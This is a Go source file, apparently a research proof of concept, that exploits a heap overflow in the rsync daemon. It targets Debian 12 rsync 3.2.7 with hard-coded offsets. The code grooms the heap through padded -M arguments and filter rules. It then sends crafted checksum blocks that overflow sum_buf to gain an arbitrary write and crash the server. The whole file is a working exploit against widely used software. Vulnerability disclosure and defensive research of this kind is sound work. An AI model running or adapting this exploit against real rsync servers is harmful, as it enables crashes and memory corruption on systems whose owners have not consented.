// CLI for a PoC for rsync client -> server memory corruption
package main

import (
	"encoding/binary"
	"fmt"
	"os"
	"strings"

	"cvr.google.com/pkg/client"
	"cvr.google.com/pkg/util"
)

const checksumSeed = "1337"

// Offsets targeting debian 12 rsync 3.2.7
// sha256sum ab0311a3e8e417aa2f0fd5727f6f5d03c1aedf562a386de03e72faef1e90c1e2
const sumBufStructSize = 40
const sumBufOffset = 0x16

const tcacheMin = 24
const tcacheMax = 1032
const tcacheStep = 16
const tcacheSlots = 7

var digest = "sha1"
var protocolVersion = "31"

func main() {
	if len(os.Args) != 2 {
		fmt.Printf("Usage: %s rsync://<host>:<port>/<module>\n", os.Args[0])
		os.Exit(1)
	}
	url := os.Args[1]

	if !strings.HasPrefix(url, "rsync://") {
		fmt.Println("--url must be in format of rsync://<host>:<port>/<module>")
		os.Exit(1)
	}

	client, err := client.NewRsyncClient(url, protocolVersion, digest)
	if client == nil {
		fmt.Fprintf(os.Stderr, "Failed to create client: %v\n", err.Error())
		os.Exit(1)
	}
	fmt.Printf("[*] Connected to %s\n", url)

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc. If you change something here, make sure to test it)

	// tell the server that it is supposed to send us the files by making it sender and server
	// the order of --server and --sender is important
	client.WriteLine("--server")
	client.WriteLine("--sender")

	// set these options to make reading the code easier and to avoid sources of unwanted allocations
	client.WriteLine("--compress-choice=zlib")
	client.WriteLine("--no-iconv")

	// set the checksum seed. This will make future calculations a little easier
	client.WriteLine("--checksum-seed=" + checksumSeed)

	// set --checksum which enables `always_checksum`. This will send us the full checksum
	// of the file before sending the file itself.
	// This is useful for us so taht we don't need to download files before performing
	// stack uninitialized data oracles
	client.WriteLine("--checksum")

	// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
	// a desync in the protocol depending on compilation options
	client.WriteLine("--no-crtimes")
	client.WriteLine("--no-atimes")

	// disable some other extra things to prevent the server from sending us extra data
	client.WriteLine("--no-owner")
	client.WriteLine("--no-group")
	client.WriteLine("--no-devices")
	client.WriteLine("--no-specials")
	client.WriteLine("--no-links")
	client.WriteLine("--no-hard-links")
	client.WriteLine("--no-acls")

	// disable `inc_recurse` and just send the entire file list at once
	client.WriteLine("--no-inc-recursive")

	// setting this will disable allow_inc_recurse and send us the entire file list at once
	// client.WriteLine("--qsort")

	// recursively download the module
	client.WriteLine("-r")

	// the -e option is followed by . and then different client information options
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
	// v sets do_negotiated_strings to true, which means we can force md4 checksums
	client.WriteLine("-e.v")

	// Consume all possible entries in tcache
	for i := tcacheMin; i <= tcacheMax; i += tcacheStep {
		for j := 0; j < tcacheSlots*2; j++ {
			client.WriteLine("-M-" + strings.Repeat("A", i-2))
		}
	}

	// sending a dot line and then a filepath tells the server which files we are requesting
	// in this case, ask for the root of the module
	client.WriteLine(".")
	client.WriteLine("./")

	// empty line to finish sending arguments
	err = client.WriteLine("")

	// only check for errors here. If the previous arguments were not sent, the server will not
	// send the files anyway
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send arguments: %v\n", err.Error())
		os.Exit(1)
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	err = client.SetupProtocol()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to setup protocol: %v\n", err.Error())
		os.Exit(1)
	}

	fmt.Println("[*] Grooming heap")
	// Send Filters
	count := 5
	filter := "+ " + strings.Repeat("Z", ((count)*sumBufStructSize)-1)
	clr := "!"

	// The filter pattern is the size we'll allocate in receive_sums
	client.WriteRawInt(len(filter) + 1)
	client.WriteLine(filter)

	// This will allocate a filter_rule after our pattern
	filter = "+ a"
	client.WriteRawInt(len(filter) + 1)
	client.WriteLine(filter)

	// Send the clear flag to free filters
	client.WriteRawInt(len(clr) + 1)
	client.WriteLine(clr)
	client.WriteRawInt(0)

	files, err := client.ReadFileList()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read file list: %v\n", err.Error())
		os.Exit(1)
	}

	// look for a non-empty regular file
	targetFile := files[0]
	targetFileNdx := -1
	for i, file := range files {
		if util.IsReg(file.Mode) && file.Size > 0 {
			targetFile = file
			targetFileNdx = i
			break
		}
	}

	if targetFileNdx == -1 {
		fmt.Fprintf(os.Stderr, "Did not find a non-empty regular file on the server\n")
		os.Exit(1)
	}

	fmt.Printf("[*] Targeting file: %s (index %d)\n", targetFile.Name, targetFileNdx)

	// We are now sending the index of the file that we want to download.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/rsync.c#L322
	err = client.WriteNdx(targetFileNdx)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write ndx: %v\n", err.Error())
		os.Exit(1)
	}

	// by setting iflags to ITEM_TRANSFER, rsync does not ask for any more data after this but sends
	// us the file
	iflags := 1 << 15
	err = client.WriteShortInt(iflags)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write iflags: %v\n", err.Error())
		os.Exit(1)
	}

	s2len := 64

	// we should now be triggering the Heap overflow!
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L70

	// the first 26 bytes are consumed by padding etc
	payload := []byte{}
	for i := 0; i < 26; i++ {
		payload = append(payload, byte(0x41))
	}

	// now comes the flength. Set it to 1337
	payload = binary.LittleEndian.AppendUint64(payload, 1337)

	// we just write 8 bytes in this PoC
	overflowSize := 8
	// target address of the abitrary write
	targetAddr := 0x4141414141414141

	// we have to adjust for the sum_buf array up to this point
	targetAddrAligned := targetAddr - ((sumBufStructSize * (count)) + sumBufOffset)

	payload = binary.LittleEndian.AppendUint64(payload, uint64(targetAddrAligned))

	// now comes the count. Set it to count + 1 so that there is an additional sum entry
	payload = binary.LittleEndian.AppendUint32(payload, uint32(count)+1)

	// blength. Set to 1337
	payload = binary.LittleEndian.AppendUint32(payload, 1337)

	// remainder. Set to 0
	payload = binary.LittleEndian.AppendUint32(payload, 0)

	// s2length will now be the size of the arbitrary write.
	payload = binary.LittleEndian.AppendUint32(payload, uint32(overflowSize))

	remainderLength := s2len - len(payload)
	// pad the rest of the payload with 0x41
	for i := 0; i < remainderLength; i++ {
		payload = append(payload, byte(0x41))
	}

	// first the sum head
	client.WriteRawInt(count)

	// we can set blength to 1337
	client.WriteRawInt(1337)

	// now comes s2length which determines overflow size
	client.WriteRawInt(s2len)

	// let's set the remainder to 0
	client.WriteRawInt(0)

	for j := 0; j < count; j++ {
		// now comes Sum1
		client.WriteRawInt(1337)

		// and now the payload
		client.Write(payload)
	}

	finalPayload := []byte{0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42}

	// finally, we write the actual data for the arbitrary write.
	// one more sum1
	client.WriteRawInt(1337)

	fmt.Println("[*] Crashing server")
	client.Write(finalPayload)

}
